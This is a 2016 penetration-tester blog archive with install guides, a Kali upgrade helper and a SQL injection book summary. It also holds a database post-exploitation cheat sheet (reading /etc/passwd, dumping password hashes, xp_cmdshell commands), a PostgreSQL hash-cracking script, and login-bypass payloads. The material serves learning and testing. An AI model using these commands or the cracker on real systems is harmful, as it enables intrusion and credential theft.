Wednesday, February 17, 2016

Practice CTF List / Permanent CTF List

I'm on a mission to become a great penetration tester. This is a list of CTFs.
Note: some links might or might not work so just try them. 

Live Online Games

Recommended

Whether they're being updated, contain high quality challenges, or just have a lot of depth, these are probably where you want to spend the most time.

Others

Meta

Webapp Specific

Forensics Specific

Recruiting

Paid Training

Downloadable Offline Games

Virtual Machines

Inactive or Gone

Just around for history's sake, or on the off-chance they come back.

Monday, February 15, 2016

How to install Ruby on Rails on CentOS 6

This is a quick tutorial on how to install Ruby on Rails on CentOS 6. Before installing Ruby on Rails, a brief explanation of what it is: Ruby on Rails is an application stack that gives web developers a framework for quickly building web applications. All right, enough jabbering, let's get on with the installation.

Installing Ruby 2.1.8 using RVM.
NOTE: by default Ruby 1.8.7 is installed on CentOS 6.

Step 1. Install the required packages
# yum install gcc-c++ patch readline readline-devel zlib zlib-devel 
# yum install libyaml-devel libffi-devel openssl-devel make 
# yum install bzip2 autoconf automake libtool bison iconv-devel sqlite-devel
Step 2. Install the latest version of RVM
# curl -L get.rvm.io | bash -s stable
This pipes a script fetched over the network straight into a root shell. On a machine you care about, download the installer to a file and read it before running it.
The installer drops the RVM archive into /usr/local/rvm/archives. If you need to re-run the installer from that archive (the version number will differ if a newer RVM has shipped):
# cd /usr/local/rvm/archives
# tar -xzvf rvm-1.26.11.tgz
# cd /usr/local/rvm/archives/rvm-1.26.11/binscripts
# ./rvm-installer
Step 3.  Setup the RVM Environment 
# source /etc/profile.d/rvm.sh
Step 4. Install ruby 
# rvm install 2.1.8

Step 5.  Configure the Default version of Ruby 
# rvm use 2.1.8 --default

Using /usr/local/rvm/gems/ruby-2.1.8

Step 6.  Check the current version of Ruby 

# ruby --version

ruby 2.1.8p440 (2015-12-16 revision 53160) [x86_64-linux]

Install Rails 
# gem install rails -V

Create a test application (optional) to verify that Rails is working properly.
NOTE: After running rails server --binding=<server ip address> you might see the error "There was an error while trying to load the gem 'uglifier'". If you see this error you need to install Node.js, because the Rails asset pipeline needs a JavaScript runtime. Run the following commands to install it (the NodeSource setup script is another script piped from the network into a root shell, so the same caution about reading it first applies; express-generator is not needed by Rails and can be skipped):

# curl -sL https://rpm.nodesource.com/setup | bash -
# yum install -y nodejs
# npm install -g express-generator
# npm -g install npm@latest

Create the application:

# cd ~
# rails new testapp
Then move into the application's directory:
# cd testapp
Create the SQLite3 database:
# rake db:create
Start the development server and browse to it:
# rails server --binding=<server ip address>
http://<server ip address>:3000

Sunday, February 14, 2016

Upgrading from Kali Linux 2.0(sana) to Kali Linux rolling edition

I've been putting a lot of things off as of late and upgrading my Kali Linux has been one of them, but no more :). This is a quick step-by-step guide on how to upgrade to the Kali Linux rolling edition.


Step 1. Before doing anything, run apt-get update and apt-get upgrade to apply any outstanding updates to the Kali Linux 2.0 image.

Step 2. Once the updates have been applied, open /etc/apt/sources.list with your favorite editor (mine being vim) and replace the existing sana entries with the following line. Leaving the sana lines active alongside the rolling one would let apt mix packages from Kali 2.0 and rolling.

deb http://http.kali.org/kali kali-rolling main non-free contrib

Step 3. After changing /etc/apt/sources.list, run the following commands, then walk away and grab some coffee and a Pop-Tart (yum).

apt-get update
apt-get dist-upgrade
reboot

Step 4. After completing the upgrade and rebooting into Kali Linux rolling, you may have to reinstall open-vm-tools-desktop to make sure the full screen option works properly with the rolling edition.
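The sources.list change in Step 2 is the one place this upgrade can go wrong quietly: if the old sana lines stay active, apt will happily mix the two suites. The following Python helper, added here as an example and not part of the original post, rewrites a sources.list body so that only the kali-rolling line is active, commenting out sana entries instead of leaving them in and refusing to add a second kali-rolling line if one is already there. The sample sources.list content is constructed and its exact layout is an assumption; the rewrite_sources_list path default is also an assumption.

```python
import shutil
import time

ROLLING_LINE = "deb http://http.kali.org/kali kali-rolling main non-free contrib"


def switch_to_rolling(sources_text: str) -> str:
    """Return a new sources.list body that points only at kali-rolling.

    - every deb/deb-src line whose suite is 'sana' or 'sana/...' is commented out
      (kept for reference, but no longer fed to apt)
    - an existing kali-rolling 'deb' line is kept once; duplicates are dropped
    - if no kali-rolling line exists, ROLLING_LINE is appended
    Running it twice yields the same output (idempotent)."""
    out = []
    have_rolling = False
    for line in sources_text.splitlines():
        stripped = line.strip()
        parts = stripped.split()
        if len(parts) >= 3 and parts[0] in ("deb", "deb-src"):
            suite = parts[2]  # layout: deb <url> <suite> <components...>
            if suite == "sana" or suite.startswith("sana/"):
                out.append("# " + stripped + "  # disabled: sana (Kali 2.0) superseded by kali-rolling")
                continue
            if parts[0] == "deb" and suite == "kali-rolling":
                if have_rolling:
                    continue  # drop a duplicate rolling line
                have_rolling = True
        out.append(line)
    if not have_rolling:
        out.append(ROLLING_LINE)
    return "\n".join(out) + "\n"


def rewrite_sources_list(path: str = "/etc/apt/sources.list") -> str:
    """Back the file up (timestamped copy next to it), rewrite it in place,
    and return the backup path so the change can be reverted."""
    backup = "%s.bak-%s" % (path, time.strftime("%Y%m%d%H%M%S"))
    shutil.copy2(path, backup)
    with open(path) as fh:
        text = fh.read()
    with open(path, "w") as fh:
        fh.write(switch_to_rolling(text))
    return backup


# Constructed sample of a Kali 2.0 (sana) sources.list; the exact lines Kali
# shipped are an assumption here, the suite names are what matter.
SAMPLE_SANA = """\
# Kali 2.0 (sana)
deb http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security sana/updates main contrib non-free
deb-src http://http.kali.org/kali sana main non-free contrib
"""

if __name__ == "__main__":
    print(switch_to_rolling(SAMPLE_SANA))
```

After `apt-get update` you can confirm apt sees only the rolling suite with `apt-cache policy`; if sana still shows up in the candidate list, an old entry survived somewhere under /etc/apt/sources.list.d/.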

Note: After the upgrade I've noticed a couple of changes:

1. The network card changed from eth0 to eno16777736. This is the same predictable-interface-name scheme you see in a default CentOS 7 installation; anything that refers to eth0 by name (/etc/network/interfaces, firewall rules, tool configs) needs updating.

2. After upgrading to Kali Linux rolling my display in full screen mode was still not right. After hours of searching and testing I found the solution that worked for me by running the following commands:



# uninstall VMware Tools (note: I transitioned from Kali 2.0):
vmware-uninstall-tools.pl

# uninstall open-vm-tools
apt-get remove open-vm-tools-desktop
apt-get autoremove
reboot

# install open-vm-tools
apt-get install open-vm-tools-desktop
reboot



Saturday, February 13, 2016

Post Exploitation The Database Edition

As a web app pentester there is nothing more annoying than encountering a database you have never worked with before and having to search all over the net for post-exploitation commands to gather more information. So this is just a small list that I put together for myself; as time goes on this list will grow and I will keep updating this post. I hope this small list can help someone else out during a web app penetration test. Most of the juicier queries below (password hashes, reading and writing server files) need superuser or DBA rights, so check which user the application connects as first.


Postgres Post Exploitation Commands

select version();
select current_database();
select current_user;
select session_user;
select current_setting('log_connections');   -- are connections being logged?
select current_setting('log_statement');     -- are your statements being logged?
select current_setting('port');
select current_setting('password_encryption');
select current_setting('krb_server_keyfile');
select current_setting('virtual_host');      -- old name; current versions use current_setting('listen_addresses')
select current_setting('config_file');
select current_setting('hba_file');
select current_setting('data_directory');
select * from pg_shadow;   -- usernames and password hashes; readable by superusers only
select * from pg_group;
-- Read a file from the database server's filesystem (COPY to/from a server file needs superuser):
create table myfile (input TEXT);
copy myfile from '/etc/passwd';
select * from myfile;
-- Write the table's contents out to a file on the database server:
copy myfile to '/tmp/test';
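What you do with the pg_shadow rows is not shown above. The following Python block, an added example rather than part of the original post, rebuilds PostgreSQL's legacy md5 password hash (the format stored in pg_shadow.passwd before SCRAM was introduced) and runs a wordlist against a dumped set of rows. The sample rows and wordlist are constructed for the example; the md5 rows are generated in place so it runs offline.

```python
import hashlib


def pg_md5_hash(username: str, password: str) -> str:
    """Rebuild the legacy PostgreSQL 'md5' password hash as stored in
    pg_shadow.passwd / pg_authid.rolpassword:

        'md5' + hex(md5(password || username))

    The only "salt" is the username, so every candidate costs one MD5."""
    digest = hashlib.md5((password + username).encode("utf-8")).hexdigest()
    return "md5" + digest


def check_pg_password(username: str, stored, candidate: str) -> bool:
    """True if `candidate` is the password behind the md5 hash `stored`."""
    if not stored or not stored.startswith("md5") or len(stored) != 35:
        return False
    return pg_md5_hash(username, candidate) == stored


def crack_pg_shadow(rows, wordlist):
    """rows: (usename, passwd) pairs as returned by
    `select usename, passwd from pg_shadow`.
    Returns {usename: password} for each hash matched by a wordlist entry.
    SCRAM-SHA-256 rows (PostgreSQL 10+) are salted and iterated and are
    skipped here; NULL passwd means the role has no password set."""
    found = {}
    for usename, passwd in rows:
        if not passwd or passwd.startswith("SCRAM-SHA-256$"):
            continue
        for word in wordlist:
            if check_pg_password(usename, passwd, word):
                found[usename] = word
                break
    return found


# Constructed sample dump (not real credentials). The md5 values are computed
# here so the example runs offline; on an engagement use the pg_shadow output.
SAMPLE_ROWS = [
    ("postgres", pg_md5_hash("postgres", "postgres")),
    ("app",      pg_md5_hash("app", "Winter2016")),
    ("readonly", "SCRAM-SHA-256$4096:c2FsdA==$c3RvcmVk:c2VydmVy"),  # placeholder SCRAM row
    ("nopass",   None),
]
SAMPLE_WORDLIST = ["password", "postgres", "admin", "Winter2016"]

if __name__ == "__main__":
    print(crack_pg_shadow(SAMPLE_ROWS, SAMPLE_WORDLIST))
```

Because the username is the only salt, two roles with the same name on different servers and the same password share a hash, which is why `password_encryption` from the settings list above is worth checking: `md5` there means every hash you pull is this cheap to attack.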


DB2 Post Exploitation Commands

select versionnumber, version_timestamp from sysibm.sysversions;
select user from sysibm.sysdummy1;            -- sysibm.sysdummy1 is DB2's one-row dummy table (like Oracle's dual)
select session_user from sysibm.sysdummy1;
select system_user from sysibm.sysdummy1;
select current server from sysibm.sysdummy1;
select name from sysibm.systables;
select grantee from syscat.dbauth;
select * from syscat.tabauth;
select * from syscat.dbauth where grantee = current user;
select * from syscat.tabauth where grantee = current user;
select name, tbname, coltype from sysibm.syscolumns;
select schemaname from syscat.schemata;

MS SQL Post Exploitation Commands

select @@version
select @@servername
select @@microsoftversion
select * from master..sysservers
select * from sysusers
-- xp_cmdshell is disabled by default on SQL Server 2005 and later; re-enabling it through sp_configure needs sysadmin.
-- The '+' signs in the original payloads are URL-encoded spaces from an injection string; in plain T-SQL they are spaces.
exec master..xp_cmdshell 'ipconfig /all'
exec master..xp_cmdshell 'net view'
exec master..xp_cmdshell 'net users'
exec master..xp_cmdshell 'ping <host>'
BACKUP DATABASE master TO DISK='\\\\backupdb.dat'
-- Read a file from the server's filesystem into a table (BULK INSERT needs the bulkadmin role or ADMINISTER BULK OPERATIONS):
create table myfile (line varchar(8000))
bulk insert myfile from 'c:\inetpub\wwwroot\auth.asp'
select * from myfile


Oracle Post Exploitation Commands

SELECT * FROM v$version;
SELECT version FROM v$instance;
SELECT instance_name FROM v$instance;
SELECT name FROM v$database;
SELECT DISTINCT owner FROM all_tables;
SELECT user FROM dual;
SELECT username FROM all_users ORDER BY username;
SELECT column_name FROM all_tab_columns;
SELECT table_name FROM all_tables;
SELECT name, password, astatus FROM sys.user$;   -- password hashes; SYS.USER$ is normally readable only by SYS/DBA accounts
SELECT DISTINCT grantee FROM dba_sys_privs WHERE admin_option = 'YES';   -- dba_* views need DBA privileges


SQL injection - Attacks and defense second edition by Justin Clarke

As my journey to becoming a very solid web application penetration tester continues, I'm taking the time to blog about the SQL Injection Attacks and Defense (Second Edition) book. If you don't have this book in your library I would recommend you pick up a copy. It is an excellent resource if you want to learn the ins and outs of SQL injection and how it works. I've summarized each chapter of the book, so without further ado let's get into it.


This book has 10 chapters

Chapter 1 - What is SQL injection?

This is just a basic introduction to the topic of the book. It's kind of a weird chapter, but I would recommend that you read it and re-read it at the end.


Chapter 2 - Testing for SQL injection

This chapter looks at SQL injection from a hacker's perspective and shows how to find SQL injection in a web application that's connected to a database. This is a nice intro to the rest of the book. It provides useful tips about the SQL errors displayed by MS SQL Server, MySQL and Oracle.

Chapter 3 - Reviewing code for SQL injection

This chapter looks at SQL injection from a developer's point of view and shows how to follow user data through lines of PHP, Java and C# code. The end of the chapter mentions some source code analysis tools like YASCA or the MS Source Code Analyzer for SQL Injection.

Chapter 4 - Exploiting SQL injection

This chapter talks about exploiting SQL injection step by step: identifying the database, extracting data through UNION statements, using conditional statements, enumerating the database schema, escalating privileges, stealing password hashes and out-of-band communication.

Chapter 5 - Blind SQL injection exploitation

This chapter covers time-based, binary search, bit-by-bit inference and response-based techniques; the authors present ways to infer knowledge out of the interaction with a database when no query output is returned directly.

Chapter 6 - Exploiting the operating system

This chapter discusses ways to read and write files and execute OS commands.

Chapter 7 - Advanced topics

This chapter describes ways to evade input filters, to exploit second-order SQL injection and to use hybrid attacks.

Chapter 8 - Code-level defenses

This is the chapter that developers should read without any doubt. The key to avoiding SQL injection is to build every database access on parameterised queries, so that user-supplied values are passed to the driver as parameters and never concatenated into the SQL text. The authors then propose a series of recommendations for validating input and encoding output.
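To make the Chapter 8 point concrete, here is an added example (mine, not code from the book or the blog) that puts the vulnerable string-building login next to its parameterised fix, using Python's bundled sqlite3 so it runs offline. The users table and its two rows are constructed sample data.

```python
import sqlite3


def build_demo_db() -> sqlite3.Connection:
    """In-memory users table with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT NOT NULL, password TEXT NOT NULL)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """The anti-pattern: user input is spliced into the statement text, so a
    quote or comment marker in the input changes the shape of the query."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn: sqlite3.Connection, username: str, password: str):
    """Chapter 8's fix: the statement is fixed text with placeholders and the
    values travel separately, so they can only ever be compared as data."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


# Two classic payloads from the testing chapters
BYPASS_PASSWORD = "' OR '1'='1"   # turns the WHERE clause into (... AND password='') OR true
COMMENT_USERNAME = "alice'--"      # closes the string and comments out the password check

if __name__ == "__main__":
    db = build_demo_db()
    print("vulnerable, bypass  :", login_vulnerable(db, "nobody", BYPASS_PASSWORD))
    print("vulnerable, comment :", login_vulnerable(db, COMMENT_USERNAME, "wrong"))
    print("parameterised, bypass  :", login_parameterized(db, "nobody", BYPASS_PASSWORD))
    print("parameterised, comment :", login_parameterized(db, COMMENT_USERNAME, "wrong"))
```

Both payloads log in as alice through `login_vulnerable` and fail through `login_parameterized`; the parameterised version is not escaping anything, it simply never lets the input become SQL.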

Chapter 9 - Platform-level defenses

Together with good coding practices, there are measures at the platform level that reduce the impact of SQL injection: web application firewalls, web server filters, IDSs and hardening the database itself. These are defence in depth, not a substitute for parameterised queries.

Chapter 10 - This is the chapter every white hat hacker should have at hand when assessing a web app connected to a database. It is a great reference of SQL commands and SQL injection tweaks for SQL Server, MySQL, Oracle, PostgreSQL and even DB2.

Again, I would recommend this book to anyone who is serious about really learning SQL injection.

Cracking Kerberos Service Tickets (TGS) Using Kerberoasting

As of late I've been spending a lot of time researching and learning different techniques when it comes to attacking Active Directory En...